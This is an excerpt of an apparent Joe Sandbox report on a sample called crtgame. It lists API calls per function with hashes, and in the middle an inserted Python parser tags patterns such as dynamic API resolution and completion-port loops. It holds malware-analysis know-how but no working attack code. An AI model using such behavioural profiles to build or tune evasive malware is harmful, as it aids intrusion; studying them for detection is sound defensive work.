                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Send
                                                                                            • String ID:
                                                                                            • API String ID: 1282938840-0
                                                                                            • Opcode ID: 7bf488fcd5b4b377c6e45b425fc3c0afa10f0f352f9066a95509a0cc0809ba30
                                                                                            • Instruction ID: 51a66d63107dd6d65e14b74b627120f9b4f433cc63c6c42cd2d56b9f67487d05
                                                                                            • Opcode Fuzzy Hash: 7bf488fcd5b4b377c6e45b425fc3c0afa10f0f352f9066a95509a0cc0809ba30
                                                                                            • Instruction Fuzzy Hash: F70171B5940319AFD7215F94C98496FBBEDFB843A0B20496EF95997200EF70DD008BA1
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,00000000,?,02A3752F,?,02A674D8,02A674D8,?,?,02A674D8,00000000,000007E7), ref: 02A37D90
                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 02A37D99
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastshutdown
                                                                                            • String ID:
                                                                                            • API String ID: 1920494066-0
                                                                                            • Opcode ID: 1425114cfed0817f48e50ca860f02ead317648ef8a56ea3572d9bf12895e9003
                                                                                            • Instruction ID: fe34d1d24c6839fa4a2daa7052e794be9794c44df3492d69dda2fe433b5d6c80
                                                                                            • Opcode Fuzzy Hash: 1425114cfed0817f48e50ca860f02ead317648ef8a56ea3572d9bf12895e9003
                                                                                            • Instruction Fuzzy Hash: 9BF06D71A403259FD711AF64D900B6AB7E5EF48320F108859E99597380EF70A8008FA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A35049
                                                                                              • Part of subcall function 02A33D7E: htons.WS2_32(?), ref: 02A33DA2
                                                                                              • Part of subcall function 02A33D7E: htonl.WS2_32(00000000), ref: 02A33DB9
                                                                                              • Part of subcall function 02A33D7E: htonl.WS2_32(00000000), ref: 02A33DC0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: htonl$H_prologhtons
                                                                                            • String ID:
                                                                                            • API String ID: 4039807196-0
                                                                                            • Opcode ID: f925de801b2bf09557c9b70d5f50e3c8e471a3c9fae5e2bc659a54749d95d0e4
                                                                                            • Instruction ID: 2bad320e3e5972b6cebaa44224be6ddec09997d3721189920d62156475516410
                                                                                            • Opcode Fuzzy Hash: f925de801b2bf09557c9b70d5f50e3c8e471a3c9fae5e2bc659a54749d95d0e4
                                                                                            • Instruction Fuzzy Hash: C98148B1D4025E9ECF06DFE8D580AEEFBB5AF48310F10815AE854B7240EB355A05CFA0
                                                                                            APIs
                                                                                            • SHGetSpecialFolderPathA.SHELL32 ref: 02AB3C08
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A6A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A6A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a6a000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderPathSpecial
                                                                                            • String ID:
                                                                                            • API String ID: 994120019-0
                                                                                            • Opcode ID: 150eabab00ed319004a381af93edff15746af059d6f968e0e1cf10c3179792d4
                                                                                            • Instruction ID: 57750a5edbedf2d1bc893181307140ffb5ae1644e36c942e1cf117f97bb977a6
                                                                                            • Opcode Fuzzy Hash: 150eabab00ed319004a381af93edff15746af059d6f968e0e1cf10c3179792d4
                                                                                            • Instruction Fuzzy Hash: 892191B260C614AFE7057A18EC467BABBE4EF84720F06893EE7C446750EA315845C6D7
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3E352
                                                                                              • Part of subcall function 02A31A01: TlsGetValue.KERNEL32 ref: 02A31A0A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologValue
                                                                                            • String ID:
                                                                                            • API String ID: 3700342317-0
                                                                                            • Opcode ID: 889ac72f4424f3bdd813d5fed9e65928fb3e9b80df4e84d98eeed40eb2b6acac
                                                                                            • Instruction ID: be094978002dac014544c84dd8f677653997347d9164daf6887c4ceedd01a7d2
                                                                                            • Opcode Fuzzy Hash: 889ac72f4424f3bdd813d5fed9e65928fb3e9b80df4e84d98eeed40eb2b6acac
                                                                                            • Instruction Fuzzy Hash: 2C212CB2904209AFDB05DFA5D640AEFBBF9EF48310F10456EF905E7240DB71A911CBA1
                                                                                            APIs
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02A333CC
                                                                                              • Part of subcall function 02A332AB: __EH_prolog.LIBCMT ref: 02A332B0
                                                                                              • Part of subcall function 02A332AB: RtlEnterCriticalSection.NTDLL(?), ref: 02A332C3
                                                                                              • Part of subcall function 02A332AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02A332EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                                            • String ID:
                                                                                            • API String ID: 1518410164-0
                                                                                            • Opcode ID: e824ffa1bda977d2b144c1988b26e88d242bd986583b5a557573d507be82eb70
                                                                                            • Instruction ID: 3535ce1cd55664a03d29c0c4b11e3871638860469275f6f9b31cdcf992bfcccf
                                                                                            • Opcode Fuzzy Hash: e824ffa1bda977d2b144c1988b26e88d242bd986583b5a557573d507be82eb70
                                                                                            • Instruction Fuzzy Hash: 47012D71654606AFDB059F59D885B56FBA9FF45321B10835AF828872C0EF70E821CBA4
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3DEE2
                                                                                              • Part of subcall function 02A326DB: RtlEnterCriticalSection.NTDLL(?), ref: 02A32706
                                                                                              • Part of subcall function 02A326DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02A3272B
                                                                                              • Part of subcall function 02A326DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A55553), ref: 02A32738
                                                                                              • Part of subcall function 02A326DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02A32778
                                                                                              • Part of subcall function 02A326DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02A327D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                            • String ID:
                                                                                            • API String ID: 4293676635-0
                                                                                            • Opcode ID: 54785b042d669c001653a106cabfab41e81fad4197b23e8740368f86fc81c47e
                                                                                            • Instruction ID: 347b8e600ef624e79ea42bdef4cb37c949e7ffd422f98178c2c2fabbc191170e
                                                                                            • Opcode Fuzzy Hash: 54785b042d669c001653a106cabfab41e81fad4197b23e8740368f86fc81c47e
                                                                                            • Instruction Fuzzy Hash: CB0190B1900B14DFC318CF1AC640946FBF5EF88710B15C5AED8498B721EB719A40CF94
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3DCC1
                                                                                              • Part of subcall function 02A4354C: _malloc.LIBCMT ref: 02A43564
                                                                                              • Part of subcall function 02A3DEDD: __EH_prolog.LIBCMT ref: 02A3DEE2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 4254904621-0
                                                                                            • Opcode ID: 60e774225f983ed7cd7557d659c0103c5b28a6efe47937ef009b11aedfd35ee2
                                                                                            • Instruction ID: 2ff7b76ac42027d220c778f2fd9d07802a21d255f5aedb85f409ef671f37501a
                                                                                            • Opcode Fuzzy Hash: 60e774225f983ed7cd7557d659c0103c5b28a6efe47937ef009b11aedfd35ee2
                                                                                            • Instruction Fuzzy Hash: 5AE08CB1A94609AFCB1E9FA8DA0072E77A2EB44700F1046AEB80892240DF708A008A01
                                                                                            APIs
                                                                                              • Part of subcall function 02A4565A: __getptd_noexit.LIBCMT ref: 02A4565B
                                                                                              • Part of subcall function 02A4565A: __amsg_exit.LIBCMT ref: 02A45668
                                                                                              • Part of subcall function 02A42E93: __getptd_noexit.LIBCMT ref: 02A42E97
                                                                                              • Part of subcall function 02A42E93: __freeptd.LIBCMT ref: 02A42EB1
                                                                                              • Part of subcall function 02A42E93: RtlExitUserThread.NTDLL(?,00000000,?,02A42E73,00000000), ref: 02A42EBA
                                                                                            • __XcptFilter.LIBCMT ref: 02A42E7F
                                                                                              • Part of subcall function 02A48794: __getptd_noexit.LIBCMT ref: 02A48798
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                            • String ID:
                                                                                            • API String ID: 1405322794-0
                                                                                            • Opcode ID: 79187c8f188a840a2bc312e660bd86a0cc78f4f0d8b4106b32822bf4dd9bcbf3
                                                                                            • Instruction ID: f0be0dfded3d92b1ced1f981b890fd16d32f520a01c526bb60d0a47f8bc14ba9
                                                                                            • Opcode Fuzzy Hash: 79187c8f188a840a2bc312e660bd86a0cc78f4f0d8b4106b32822bf4dd9bcbf3
                                                                                            • Instruction Fuzzy Hash: EEE0E6B1981604DFE704BBA0DD49F2D7766AF44301F200445E10157260DE78D9409E21
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A6A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A6A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a6a000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: ad9e67a5dbf4182818223fb27fdbbfa945e541fbd82ee891e07dca1715771f1b
                                                                                            • Instruction ID: 511e3b761d5faa5590b6a767b3e5c2dfba067eb5171950d896da395e0bb45f8b
                                                                                            • Opcode Fuzzy Hash: ad9e67a5dbf4182818223fb27fdbbfa945e541fbd82ee891e07dca1715771f1b
                                                                                            • Instruction Fuzzy Hash: A11172B210C3089FE3157E6DEC956BAB7E9EF84620F06492EE6C1C3600DA326544C697
                                                                                            APIs
                                                                                              • Part of subcall function 02A41010: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02A410B0
                                                                                              • Part of subcall function 02A41010: CloseHandle.KERNEL32(00000000), ref: 02A410C5
                                                                                              • Part of subcall function 02A41010: ResetEvent.KERNEL32(00000000), ref: 02A410CF
                                                                                              • Part of subcall function 02A41010: CloseHandle.KERNEL32(00000000,E756C9BC), ref: 02A41104
                                                                                            • TlsSetValue.KERNEL32(00000025,?), ref: 02A41BAA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEventHandle$OpenResetValue
                                                                                            • String ID:
                                                                                            • API String ID: 1556185888-0
                                                                                            • Opcode ID: 41b5b273501aa8fb4701979f874bb7cfde6229b03646159c5d27a6e11eff6bd7
                                                                                            • Instruction ID: 06a8bf721d6c2bee9eae5f874fcb16a2b886d9a6f23e4f69036ae55ab345f5e1
                                                                                            • Opcode Fuzzy Hash: 41b5b273501aa8fb4701979f874bb7cfde6229b03646159c5d27a6e11eff6bd7
                                                                                            • Instruction Fuzzy Hash: 1A01D471A44204BBD700CF58DC49B5ABBB8FB45B60F004766E825D3780DF31E8008A90
                                                                                            APIs
                                                                                              • Part of subcall function 02A39462: __EH_prolog.LIBCMT ref: 02A39467
                                                                                              • Part of subcall function 02A39462: _Allocate.LIBCPMT ref: 02A394BE
                                                                                            • _memset.LIBCMT ref: 02A40339
                                                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02A403A2
                                                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02A403AA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateErrorFormatH_prologLastMessage_memset
                                                                                            • String ID: Unknown error$invalid string position
                                                                                            • API String ID: 2731337147-1837348584
                                                                                            • Opcode ID: bf2d4b94bff69c0f9820f6071935033432962effb3a532331a3507f717ee390f
                                                                                            • Instruction ID: 65464fcc57937b1dc1019468fa6ec43710ebbf5257150f6b3790be07682d4c85
                                                                                            • Opcode Fuzzy Hash: bf2d4b94bff69c0f9820f6071935033432962effb3a532331a3507f717ee390f
                                                                                            • Instruction Fuzzy Hash: 465198716083419FEB18CF24C890B2FBBE4BB98708F90492DF58197691DF75E588CB92
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02A44896,?,?,?,00000001), ref: 02A48F2D
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02A48F36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 492e8d19455bb173cf4f9ada8d779fa14e36879b378c95f0bf118625402db9d0
                                                                                            • Instruction ID: 5269c2a295af32dd40fdce0c92a9aec737ae53fb1a18ef0ae22acfb65eae908d
                                                                                            • Opcode Fuzzy Hash: 492e8d19455bb173cf4f9ada8d779fa14e36879b378c95f0bf118625402db9d0
                                                                                            • Instruction Fuzzy Hash: 05B09231484318EBCA412B91EC09B9ABFA8EF04762F404850F60E54061CF7294229AA2
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A324E6
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02A324FC
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A3250E
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A3256D
                                                                                            • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 02A3257F
                                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02A32599
                                                                                            • GetLastError.KERNEL32(?,7591DFB0), ref: 02A325A2
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02A325F0
                                                                                            • InterlockedDecrement.KERNEL32(00000002), ref: 02A3262F
                                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02A3268E
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A32699
                                                                                            • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02A326AD
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 02A326BD
                                                                                            • GetLastError.KERNEL32(?,7591DFB0), ref: 02A326C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                            • String ID:
                                                                                            • API String ID: 1213838671-0
                                                                                            • Opcode ID: 259ff42eb5b211a87cd93347f16bf0a88f7f06d62832eceab1bd4d419549ccc8
                                                                                            • Instruction ID: cd5bfe14f7b55e710771e9afeba86c92cd72e8e14044a4fd2947359208103b0c
                                                                                            • Opcode Fuzzy Hash: 259ff42eb5b211a87cd93347f16bf0a88f7f06d62832eceab1bd4d419549ccc8
                                                                                            • Instruction Fuzzy Hash: FF610B71940319AFCB11DFA4D984AAEBBB9FF08310F10496AF916E3240EB34DA55CB60
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A34533
                                                                                              • Part of subcall function 02A4354C: _malloc.LIBCMT ref: 02A43564
                                                                                            • htons.WS2_32(?), ref: 02A34594
                                                                                            • htonl.WS2_32(?), ref: 02A345B7
                                                                                            • htonl.WS2_32(00000000), ref: 02A345BE
                                                                                            • htons.WS2_32(00000000), ref: 02A34672
                                                                                            • _sprintf.LIBCMT ref: 02A34688
                                                                                            • htons.WS2_32(?), ref: 02A345DB
                                                                                              • Part of subcall function 02A390C0: __EH_prolog.LIBCMT ref: 02A390C5
                                                                                              • Part of subcall function 02A390C0: RtlEnterCriticalSection.NTDLL(00000020), ref: 02A39140
                                                                                              • Part of subcall function 02A390C0: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02A3915E
                                                                                              • Part of subcall function 02A31BA7: __EH_prolog.LIBCMT ref: 02A31BAC
                                                                                              • Part of subcall function 02A31BA7: RtlEnterCriticalSection.NTDLL ref: 02A31BBC
                                                                                              • Part of subcall function 02A31BA7: RtlLeaveCriticalSection.NTDLL ref: 02A31BEA
                                                                                              • Part of subcall function 02A31BA7: RtlEnterCriticalSection.NTDLL ref: 02A31C13
                                                                                              • Part of subcall function 02A31BA7: RtlLeaveCriticalSection.NTDLL ref: 02A31C56
                                                                                              • Part of subcall function 02A3D87F: __EH_prolog.LIBCMT ref: 02A3D884
                                                                                            • htonl.WS2_32(?), ref: 02A348A7
                                                                                            • htonl.WS2_32(00000000), ref: 02A348AE
                                                                                            • htonl.WS2_32(00000000), ref: 02A348F3
                                                                                            • htonl.WS2_32(00000000), ref: 02A348FA
                                                                                            • htons.WS2_32(?), ref: 02A3491A
                                                                                            • htons.WS2_32(?), ref: 02A34924
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_sprintf
                                                                                            • String ID:
                                                                                            • API String ID: 725951905-0
                                                                                            • Opcode ID: 8d23eeb9d3c87d1482d2efa8d029b3371c632f25b3f1c4203ef83fb9aba0c550
                                                                                            • Instruction ID: aff9a82af61157f7157a59b20900a20c67b05579fd6368c8dcfd75c525ba8963
                                                                                            • Opcode Fuzzy Hash: 8d23eeb9d3c87d1482d2efa8d029b3371c632f25b3f1c4203ef83fb9aba0c550
                                                                                            • Instruction Fuzzy Hash: 8D0228B1D40219EEEF16DBA4C944BEEBBB9AF09304F10419AF505B7280DF745A49CFA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A33428
                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02A3346B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02A33472
                                                                                            • GetLastError.KERNEL32 ref: 02A33486
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02A334D7
                                                                                            • RtlEnterCriticalSection.NTDLL(00000018), ref: 02A334ED
                                                                                            • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02A33518
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                            • String ID: CancelIoEx$KERNEL32
                                                                                            • API String ID: 2902213904-434325024
                                                                                            • Opcode ID: 3ccfbc3965787029c1962cb203aa4f6b20e8c089c5522b85f9a7eb30c79d4380
                                                                                            • Instruction ID: 0d27d635229e54bb20cd765c764dbafcd1376ac947cb94dc8d466ba5a972dc7c
                                                                                            • Opcode Fuzzy Hash: 3ccfbc3965787029c1962cb203aa4f6b20e8c089c5522b85f9a7eb30c79d4380
                                                                                            • Instruction Fuzzy Hash: 2C315EB1944325DFDF129F64C98466ABBF9FF49321F008899F906AB240DF70D901CBA1
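The records above are the report's function-level listing: each block opens with an `APIs` header, lists the Win32 and CRT calls seen at call sites (`ref:` is the call-site address in the memory dump, and `Part of subcall function` lines belong to a callee rather than to the function itself) and closes with the API-ID and fuzzy-hash metadata. Parsing them answers the questions an analyst asks first of this sample: which functions resolve imports at run time (the `GetModuleHandleA(KERNEL32,CancelIoEx)` / `GetProcAddress` pair), which run an I/O completion port loop (`GetQueuedCompletionStatus` / `PostQueuedCompletionStatus`), and where a waitable timer is armed and with what period (the `000493E0` third argument to `SetWaitableTimer` is the `lPeriod`, 300000 ms). The parser below is an added example, not Joe Sandbox code: the record layout is taken from the listing, the pattern tags and function names are our own, and the sample text is constructed from four of the records above. It also cross-checks the two views the report gives of one callee: the record that lists `OpenEventA` / `CloseHandle` as `Part of subcall function 02A41010` against the record that lists the same call sites directly. One caveat: argument values are whatever the sandbox captured on the stack at call time (`?` means unknown), so the period is only recovered where a constant was recorded.

```python
"""Parse the 'APIs' function records of a Joe Sandbox report (layout as in the
listing above) and flag API-usage patterns worth triaging first."""
import re
from dataclasses import dataclass, field

API_RE = re.compile(  # '• Name.MODULE(args), ref: ADDR' or '• Name.MODULE ref: ADDR'
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
META_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")  # 'API ID: ...', 'Source File: ...'
HEX_RE = re.compile(r"^[0-9A-F]{8}$")
PATTERNS = {  # tag (our own name) -> any of these API names
    "IOCP loop": {"GetQueuedCompletionStatus", "PostQueuedCompletionStatus"},
    "waitable timer": {"CreateWaitableTimerA", "CreateWaitableTimerW", "SetWaitableTimer"},
    "exception filter hook": {"SetUnhandledExceptionFilter"},
    "network byte order": {"htons", "htonl"},
}
LOADERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                           # call-site address in the dump
    subcall_of: "int | None" = None    # callee address on 'Part of subcall function' lines

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)
    def names(self, subcalls=True):
        return {c.name for c in self.calls if subcalls or c.subcall_of is None}
    def string_args(self):  # literal arguments: neither '?' nor an 8-digit hex constant
        return [a for c in self.calls for a in c.args if a and a != "?" and not HEX_RE.match(a)]

def parse_records(text):
    """Split report text into FunctionRecords; each record starts at an 'APIs' header."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()                # the report indents every line
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
        elif cur is None or not line.startswith("•"):
            continue                      # 'Strings', 'Yara matches', ... carry no data here
        elif (m := API_RE.match(line)):
            args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
        elif (m := META_RE.match(line)):
            cur.meta[m["key"]] = m["val"]
    return records

def flag(rec):
    n = rec.names()
    tags = {tag for tag, apis in PATTERNS.items() if n & apis}
    if "GetProcAddress" in n and n & LOADERS:
        tags.add("dynamic API resolution")
    return tags

def timer_period_ms(rec):
    """lPeriod (3rd argument) of SetWaitableTimer, when the listing recorded a constant."""
    for c in rec.calls:
        if c.name == "SetWaitableTimer" and len(c.args) >= 3 and HEX_RE.match(c.args[2]):
            return int(c.args[2], 16)
    return None

def resolve_subcalls(records):
    """Callee of each 'Part of subcall function' line -> index of the record that lists
    the same call sites directly (None when no record covers that callee)."""
    site = {c.ref: i for i, r in enumerate(records) for c in r.calls if c.subcall_of is None}
    out = {}
    for r in records:
        for c in r.calls:
            if c.subcall_of is not None:
                hit = site.get(c.ref)
                if hit is not None or c.subcall_of not in out:
                    out[c.subcall_of] = hit
    return out

# Constructed sample: four records copied from the listing above, trimmed to the lines used.
SAMPLE = """
APIs
• __EH_prolog.LIBCMT ref: 02A3DEE2
  • Part of subcall function 02A326DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02A3272B
  • Part of subcall function 02A326DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02A32778
• Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
APIs
  • Part of subcall function 02A41010: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02A410B0
  • Part of subcall function 02A41010: CloseHandle.KERNEL32(00000000,E756C9BC), ref: 02A41104
• TlsSetValue.KERNEL32(00000025,?), ref: 02A41BAA
APIs
• GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02A3346B
• GetProcAddress.KERNEL32(00000000), ref: 02A33472
• String ID: CancelIoEx$KERNEL32
APIs
• CloseHandle.KERNEL32(00000000,E756C9BC), ref: 02A41104
"""
```

Run against the full report text instead of `SAMPLE` to get one line per function; `flag` tags the `CancelIoEx` resolver, the completion-port worker and the timer functions, `timer_period_ms` returns 300000 for the record whose subcall arms the timer with `000493E0`, and `resolve_subcalls` shows that `02A41010` has its own record while `02A326DB` does not appear as a direct listing in this excerpt.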
APIs
• OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02A410B0
• CloseHandle.KERNEL32(00000000), ref: 02A410C5
• ResetEvent.KERNEL32(00000000), ref: 02A410CF
• CloseHandle.KERNEL32(00000000,E756C9BC), ref: 02A41104
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,E756C9BC), ref: 02A4117A
• CloseHandle.KERNEL32(00000000), ref: 02A4118F
Memory Dump Source
• Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$CreateOpenReset
• String ID:
• API String ID: 1285874450-0
• Opcode ID: ae8fa74201eebda21fc5a19bd0bf045098b0146a84337aa7f6b5e3a9b8b2d8c3
• Instruction ID: db536ee55c7d5409206ab933b52024cff8dbc409c4b1e7729bb881fd28df9f61
• Opcode Fuzzy Hash: ae8fa74201eebda21fc5a19bd0bf045098b0146a84337aa7f6b5e3a9b8b2d8c3
• Instruction Fuzzy Hash: 1A411F70D04358ABDF10CFA9C884BAEB7B8AF45724F144619E829EB280DF70E945CB51

APIs
• InterlockedExchange.KERNEL32(?,00000001), ref: 02A320AC
